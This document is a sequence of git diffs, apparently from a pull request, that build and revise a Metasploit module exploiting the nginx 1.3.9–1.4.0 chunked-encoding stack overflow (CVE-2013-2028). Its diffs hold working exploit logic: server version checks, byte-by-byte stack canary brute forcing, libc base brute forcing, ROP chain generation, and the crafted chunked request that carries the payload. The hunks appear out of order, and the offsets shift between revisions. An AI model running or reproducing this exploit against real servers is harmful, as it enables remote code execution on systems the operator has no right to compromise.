 			OptInt.new("CANARY", [false, "Use this value as stack canary instead of brute forcing it", 0xffffffff]),
@@ -111,9 +115,9 @@ class Metasploit4 < Msf::Exploit::Remote
 		begin
 			res = send_request_fixed(nil)
 
-			if res =~ /nginx\/(1\.3\.(9|10|11|12|13|14|15|16)|1\.4\.0)/
+			if res =~ /^Server: nginx\/(1\.3\.(9|10|11|12|13|14|15|16)|1\.4\.0)/m
 				return Exploit::CheckCode::Appears
-			elsif res =~ /nginx/
+			elsif res =~ /^Server: nginx/m
 				return Exploit::CheckCode::Detected
 			end
 

--- a/modules/exploits/linux/http/nginx_chunked_size.rb
+++ b/modules/exploits/linux/http/nginx_chunked_size.rb
@@ -51,7 +51,7 @@ class Metasploit4 < Msf::Exploit::Remote
 							'Arch' => ARCH_X86,
 							'Ropname' => 'Kali Linux 1.0',
 							'Platform' => 'linux',
-							'Offset' => 5030,
+							'Offset' => 5034,
 							'Bruteforce' =>
 								{
 									'Start' => { 'libc_base' => 0xb74c0000},

--- a/modules/exploits/linux/http/nginx_chunked_size.rb
+++ b/modules/exploits/linux/http/nginx_chunked_size.rb
@@ -81,7 +81,7 @@ class Metasploit4 < Msf::Exploit::Remote
 						'Arch' => ARCH_X86,
 						'Ropname' => 'Ubuntu 13.04',
 						'Platform' => 'linux',
-						'CanaryOffset' => 4971,
+						'CanaryOffset' => 4967,
 						'Offset' => 12,
 						'Bruteforce' =>
 							{
@@ -96,6 +96,12 @@ class Metasploit4 < Msf::Exploit::Remote
 
 			'DefaultTarget' => 0
 	))
+
+    register_advanced_options(
+        [
+            OptInt.new("CANARY", [false, "Use this value as stack canary instead of brute forcing it", 0xffffffff]),
+            OptInt.new("LIBC_BASE", [false, "Use this value as libc base address instead of brute forcing it", 0xffffffff])
+        ], self.class)
 
 	end
 
@@ -127,11 +133,11 @@ class Metasploit4 < Msf::Exploit::Remote
 		print_status("Sending #{payload.encoded.length} byte payload at base 0x%08x" % target_addrs['libc_base'])
 
 		if target['CanaryOffset'].nil?
-			data = 	"A" * target['Offset']
+			data = 'A'*1000 + Rex::Text.rand_text_hex(target['Offset'] - 1000)
 		else
-			data = 	"A"*target['CanaryOffset']
-			data <<	[datastore['canary']].pack('V')
-			data << "A"*target['Offset']
+			data = 'A'*1000 + Rex::Text.rand_text_hex(target['CanaryOffset'] - 1000)
+			data <<	[datastore['CANARY']].pack('V')
+			data << Rex::Text.rand_text_hex(target['Offset'])
 		end
 
 		data <<	generate_rop_payload('nginx', payload.encoded,{'target'=>target['Ropname'], 'base'=> target_addrs['libc_base'] })
@@ -156,6 +162,8 @@ class Metasploit4 < Msf::Exploit::Remote
 	def exploit
 		if target['CanaryOffset'].nil?
 			print_status("Target not using a stack canary")
+        elsif not datastore['CANARY'] == 0xffffffff
+            print_status("Using 0x%08x as stack canary" % datastore['CANARY'])
 		else
 			print_status("Searching for stack canary")
 			canary = find_canary
@@ -165,11 +173,16 @@ class Metasploit4 < Msf::Exploit::Remote
 				return
 			else
 				print_status("Canary found: 0x%08x\n" % canary)
-				datastore['canary'] = canary
+				datastore['CANARY'] = canary
 			end
 		end
-
-		super
+        
+        if datastore['LIBC_BASE'] == 0xffffffff
+            # brute force the base address
+    		super
+        else
+            brute_exploit({'libc_base' => datastore['LIBC_BASE']})
+        end
 	end
 
 	def find_canary
@@ -183,7 +196,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
 			0.upto(255) do |i|
 				begin
-					data = 	"A"*target['CanaryOffset']
+					data = 'A'*1000 + Rex::Text.rand_text_hex(target['CanaryOffset'] - 1000)
 					data <<	canary
 					data << i.chr
 
@@ -195,7 +208,7 @@ class Metasploit4 < Msf::Exploit::Remote
 						'data' => data
 					}, 1)
 
-					unless res.nil?
+                    if res and not res.code == 200
 						print_status("Byte #{c + 1} found: 0x%02x\n" % i)
 						canary << i.chr
 						break
@@ -214,4 +227,3 @@ class Metasploit4 < Msf::Exploit::Remote
 		end
 	end
 end
-

--- a/modules/exploits/linux/http/nginx_chunked_size.rb
+++ b/modules/exploits/linux/http/nginx_chunked_size.rb
@@ -127,15 +127,23 @@ class Metasploit4 < Msf::Exploit::Remote
 
 	end
 
+	def random_chunk_size(bytes=8)
+		return bytes.times.map{ (rand(0x80) + 0x80).to_s(16) }.join
+	end
+
 	def brute_exploit(target_addrs)
 		connect
 
 		print_status("Sending #{payload.encoded.length} byte payload at base 0x%08x" % target_addrs['libc_base'])
 
+		data = random_chunk_size
+
 		if target['CanaryOffset'].nil?
-			data = 'A'*1000 + Rex::Text.rand_text_hex(datastore['Offset'] - 1000)
+			data = 	"f" + random_chunk_size(438)
+			data <<	Rex::Text.rand_text_alpha(datastore['Offset'] - data.size)
 		else
-			data = 'A'*1000 + Rex::Text.rand_text_hex(datastore['CanaryOffset'] - 1000)
+			data = 	"f" + random_chunk_size(438)
+			data <<	Rex::Text.rand_text_alpha(datastore['CanaryOffset'] - data.size)
 			data <<	[datastore['CANARY']].pack('V')
 			data << Rex::Text.rand_text_hex(target['Offset'])
 		end
@@ -205,8 +213,8 @@ class Metasploit4 < Msf::Exploit::Remote
 
 			0.upto(255) do |i|
 				begin
-					#data = 'A'*1000 + Rex::Text.rand_text_hex(datastore['CanaryOffset'] - 1000)
-					data = 'A'*datastore['CanaryOffset']
+					data = 	"f" + random_chunk_size(438)
+					data <<	Rex::Text.rand_text_alpha(datastore['CanaryOffset'] - data.size)
 					data <<	canary
 					data << i.chr
 

--- a/modules/exploits/linux/http/nginx_chunked_size.rb
+++ b/modules/exploits/linux/http/nginx_chunked_size.rb
@@ -51,7 +51,7 @@ class Metasploit4 < Msf::Exploit::Remote
 							'Arch' => ARCH_X86,
 							'Ropname' => 'Kali Linux 1.0',
 							'Platform' => 'linux',
-							'Offset' => 5034,
+							'Offset' => 5024,
 							'Bruteforce' =>
 								{
 									'Start' => { 'libc_base' => 0xb74c0000},
@@ -127,8 +127,8 @@ class Metasploit4 < Msf::Exploit::Remote
 
 	end
 
-	def random_chunk_size(bytes=8)
-		return bytes.times.map{ (rand(0x80) + 0x80).to_s(16) }.join
+	def random_chunk_size(bytes=16)
+		return bytes.times.map{ (rand(0x8) + 0x8).to_s(16) }.join
 	end
 
 	def brute_exploit(target_addrs)
@@ -139,10 +139,10 @@ class Metasploit4 < Msf::Exploit::Remote
 		data = random_chunk_size
 
 		if target['CanaryOffset'].nil?
-			data = 	"f" + random_chunk_size(438)
+			data = 	random_chunk_size(876)
 			data <<	Rex::Text.rand_text_alpha(datastore['Offset'] - data.size)
 		else
-			data = 	"f" + random_chunk_size(438)
+			data = 	random_chunk_size(876)
 			data <<	Rex::Text.rand_text_alpha(datastore['CanaryOffset'] - data.size)
 			data <<	[datastore['CANARY']].pack('V')
 			data << Rex::Text.rand_text_hex(target['Offset'])
@@ -213,7 +213,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
 			0.upto(255) do |i|
 				begin
-					data = 	"f" + random_chunk_size(438)
+					data = 	random_chunk_size(876)
 					data <<	Rex::Text.rand_text_alpha(datastore['CanaryOffset'] - data.size)
 					data <<	canary
 					data << i.chr

--- a/modules/exploits/linux/http/nginx_chunked_size.rb
+++ b/modules/exploits/linux/http/nginx_chunked_size.rb
@@ -1,0 +1,125 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+	include Exploit::Remote::HttpClient
+	include Msf::Exploit::RopDb
+	include Msf::Exploit::Brute
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Nginx HTTP Server 1.3.9/1.4.0 Chuncked Encoding Stack Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a stack buffer overflow in 1.3.9 and 1.4.0 of nginx.
+			},
+			'Author'         => 'hal',
+			'DisclosureDate' => 'May 07 2013',
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					['CVE', '2013-2028'],
+					['OSVDB', '93037'],
+					['URL', 'http://nginx.org/en/security_advisories.html'],
+					['URL', 'http://packetstormsecurity.com/files/121560/Nginx-1.3.9-1.4.0-Stack-Buffer-Overflow.html']
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'DisabeNops' => false,
+					'Space'    => 0x800,
+					'BadChars' => "\x0d\x0a\x20",
+				},
+			'Targets'        =>
+				[
+					[
+						'Kali Linux 1.0',
+						{
+							'Arch' => ARCH_X86,
+							'Ropname' => 'Kali Linux 1.0',
+							'Platform' => 'linux',
+							'Offset' => 5030,
+							'Bruteforce' =>
+								{
+									'Start' => { 'libc_base' => 0xb74c0000},
+									'Stop'  => { 'libc_base' => 0xb75d0000},
+									'Step'  => 0x1000
+								}
+						},
+					],
+					[
+						'Red Hat Enterprise Linux 6.4',
+						{
+							'Arch' => ARCH_X86,
+							'Ropname' => 'Red Hat Enterprise Linux 6.4',
+							'Platform' => 'linux',
+							'Offset' => 5048,
+							'Bruteforce' =>
+								{
+									'Start' => { 'libc_base' => 0x00110000},
+									'Stop'  => { 'libc_base' => 0x0044f000},
+									'Step'  => 0x1000
+								}
+						}
+					],
+				],
+
+			'DefaultTarget' => 0))
+	end
+
+	def check
+		@peer = "#{rhost}:#{rport}"
+
+		begin
+			res = send_request_cgi({
+				'uri' => '/'
+			})
+
+			if res and res.code == 200 and res.headers['Server'] =~ /nginx\/(1\.3\.9|1\.4\.0)/
+				return Exploit::CheckCode::Appears
+			elsif res and res.code == 200 and res.headers['Server'] =~ /nginx/
+				return Exploit::CheckCode::Detected
+			end
+
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+			print_error("#{@peer} - Connection failed")
+		end
+
+		return Exploit::CheckCode::Unknown
+
+	end
+
+	def brute_exploit(target_addrs)
+		connect
+
+		print_status("Sending #{payload.encoded.length} byte payload at base 0x%08x" % target_addrs['libc_base'])
+
+		data = 	"A" * target['Offset']
+		data <<	generate_rop_payload('nginx', payload.encoded,{'target'=>target['Ropname'], 'base'=> target_addrs['libc_base'] })
+		data << payload.encoded
+
+		2.times do
+			begin
+				send_request_raw({
+					'uri' => 	'/',
+					'headers' =>  {
+						'Transfer-Encoding' => "Chunked",
+					},
+					'data' => data
+				}, 2)
+			rescue Errno::ECONNRESET => e
+				# Ignore
+			end
+		end
+
+
+		handler
+	end
+
+end
+

--- a/modules/exploits/linux/http/nginx_chunked_size.rb
+++ b/modules/exploits/linux/http/nginx_chunked_size.rb
@@ -81,7 +81,7 @@ class Metasploit4 < Msf::Exploit::Remote
 						'Arch' => ARCH_X86,
 						'Ropname' => 'Ubuntu 13.04',
 						'Platform' => 'linux',
-						'CanaryOffset' => 4967,
+						'CanaryOffset' => 4962,
 						'Offset' => 12,
 						'Bruteforce' =>
 							{
@@ -97,11 +97,11 @@ class Metasploit4 < Msf::Exploit::Remote
 			'DefaultTarget' => 0
 	))
 
-    register_advanced_options(
-        [
-            OptInt.new("CANARY", [false, "Use this value as stack canary instead of brute forcing it", 0xffffffff]),
-            OptInt.new("LIBC_BASE", [false, "Use this value as libc base address instead of brute forcing it", 0xffffffff])
-        ], self.class)
+	register_advanced_options(
+		[
+			OptInt.new("CANARY", [false, "Use this value as stack canary instead of brute forcing it", 0xffffffff]),
+			OptInt.new("LIBC_BASE", [false, "Use this value as libc base address instead of brute forcing it", 0xffffffff])
+		], self.class)
 
 	end
 
@@ -133,9 +133,9 @@ class Metasploit4 < Msf::Exploit::Remote
 		print_status("Sending #{payload.encoded.length} byte payload at base 0x%08x" % target_addrs['libc_base'])
 
 		if target['CanaryOffset'].nil?
-			data = 'A'*1000 + Rex::Text.rand_text_hex(target['Offset'] - 1000)
+			data = 'A'*1000 + Rex::Text.rand_text_hex(datastore['Offset'] - 1000)
 		else
-			data = 'A'*1000 + Rex::Text.rand_text_hex(target['CanaryOffset'] - 1000)
+			data = 'A'*1000 + Rex::Text.rand_text_hex(datastore['CanaryOffset'] - 1000)
 			data <<	[datastore['CANARY']].pack('V')
 			data << Rex::Text.rand_text_hex(target['Offset'])
 		end
@@ -162,27 +162,36 @@ class Metasploit4 < Msf::Exploit::Remote
 	def exploit
 		if target['CanaryOffset'].nil?
 			print_status("Target not using a stack canary")
-        elsif not datastore['CANARY'] == 0xffffffff
-            print_status("Using 0x%08x as stack canary" % datastore['CANARY'])
-		else
-			print_status("Searching for stack canary")
-			canary = find_canary
 
-			if canary.nil?
-				print_error("Unable to find stack canary.  Quiting")
-				return
+			# Update Offset based on the length of RHOST
+			datastore['Offset'] = target['Offset'] + datastore['RHOST'].size
+
+		else
+			# Update canary offset based on the length of RHOST
+			datastore['CanaryOffset'] = target['CanaryOffset'] + datastore['RHOST'].size
+
+			if not datastore['CANARY'] == 0xffffffff
+				print_status("Using 0x%08x as stack canary" % datastore['CANARY'])
 			else
-				print_status("Canary found: 0x%08x\n" % canary)
-				datastore['CANARY'] = canary
+				print_status("Searching for stack canary")
+				canary = find_canary
+
+				if canary.nil? or canary == 0x00000000
+					print_error("Unable to find stack canary.  Quiting")
+					return
+				else
+					print_status("Canary found: 0x%08x\n" % canary)
+					datastore['CANARY'] = canary
+				end
 			end
 		end
-        
-        if datastore['LIBC_BASE'] == 0xffffffff
-            # brute force the base address
-    		super
-        else
-            brute_exploit({'libc_base' => datastore['LIBC_BASE']})
-        end
+
+		if datastore['LIBC_BASE'] == 0xffffffff
+			# brute force the base address
+			super
+		else
+			brute_exploit({'libc_base' => datastore['LIBC_BASE']})
+		end
 	end
 
 	def find_canary
@@ -196,7 +205,8 @@ class Metasploit4 < Msf::Exploit::Remote
 
 			0.upto(255) do |i|
 				begin
-					data = 'A'*1000 + Rex::Text.rand_text_hex(target['CanaryOffset'] - 1000)
+					#data = 'A'*1000 + Rex::Text.rand_text_hex(datastore['CanaryOffset'] - 1000)
+					data = 'A'*datastore['CanaryOffset']
 					data <<	canary
 					data << i.chr
 
@@ -208,7 +218,7 @@ class Metasploit4 < Msf::Exploit::Remote
 						'data' => data
 					}, 1)
 
-                    if res and not res.code == 200
+					if res and not res.code == 200
 						print_status("Byte #{c + 1} found: 0x%02x\n" % i)
 						canary << i.chr
 						break

--- a/modules/exploits/linux/http/nginx_chunked_size.rb
+++ b/modules/exploits/linux/http/nginx_chunked_size.rb
@@ -103,18 +103,16 @@ class Metasploit4 < Msf::Exploit::Remote
 		data <<	generate_rop_payload('nginx', payload.encoded,{'target'=>target['Ropname'], 'base'=> target_addrs['libc_base'] })
 		data << payload.encoded
 
-		2.times do
-			begin
-				send_request_raw({
-					'uri' => 	'/',
-					'headers' =>  {
-						'Transfer-Encoding' => "Chunked",
-					},
-					'data' => data
-				}, 2)
-			rescue Errno::ECONNRESET => e
-				# Ignore
-			end
+		begin
+			send_request_raw({
+				'uri' => 	'/',
+				'headers' =>  {
+					'Transfer-Encoding' => "Chunked",
+				},
+				'data' => data
+			}, 2)
+		rescue Errno::ECONNRESET => e
+			# Ignore
 		end
 
 


### PR DESCRIPTION
This is an exploit module for the chunked encoding stack buffer overflow vulnerability in nginx 1.3.9 and 1.4.0. It also includes a ropdb xml file for the exploit with targets for Kali 1.0 (my dev environment) and RHEL 6.4 using the installed libc for both targets.
